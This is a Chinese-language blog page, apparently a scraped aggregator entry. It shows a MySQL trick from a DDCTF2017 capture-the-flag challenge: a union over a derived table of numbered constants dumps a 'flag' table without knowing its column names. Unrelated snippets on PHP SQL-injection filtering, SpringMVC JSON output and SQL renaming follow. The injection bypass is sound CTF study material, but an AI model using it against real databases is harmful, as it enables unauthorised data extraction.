這是乙個非常神奇的東西,在做lctf中大牛提及的ddctf2017中的乙個題目,廢話不多少,直接放出來效果及其利用語句
我們就可以注意到,這個時候就巧妙的將列名給繞過了!我們只需要知道表名即可mysql> select * from (select 1)a,(select 2)b,(select 3)c;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.14 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from flag;
+------+-------+------------------------+
| 1 | 2 | 3 |
+------+-------+------------------------+
| 1 | 2 | 3 |
| 1 | admin | flag |
| 2 | guest | flag |
| 3 | fuzz | flag |
+------+-------+------------------------+
4 rows in set (0.00 sec)
mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from flag)e;
+------------------------+
| 3 |
+------------------------+
| 3 |
| flag |
| flag |
| flag |
+------------------------+
4 rows in set (0.00 sec)
是乙個之前不知道的特性,具體請看lctf中的題目吧。
php過濾提交資料 防止sql注入攻擊
規則 1 絕不要信任外部資料或輸入 關於 web 應用程式安全性,必須認識到的第一件事是不應該信任外部資料。外部資料 outside data 包括不是由程式設計師在 php 中直接輸入的任何資料。在採取措施確保安全之前,來自任何其他 比如 get 變數 表單 post 資料庫 配置檔案 會話變數或...
SpringMVC是如何過濾json資料的
rt,比如我想將user物件轉換成json資料給前台,但是有一些user的屬性我不想給前台,例如密碼,建立日期等等,springmvc是如何實現的 propertyfilter propertyfilter newpropertyfilter returnfalse this.outjson res...
SQL語句如何更改資料庫名,表名,列名
本文介紹sql語句如何更改資料庫名,表名,列名。一 更改資料庫名 sp renamedb 更改資料庫的名稱。語法sp renamedb dbname old name newname new name 引數 dbname old name 是資料庫的當前名稱。old name 為 sysname 型...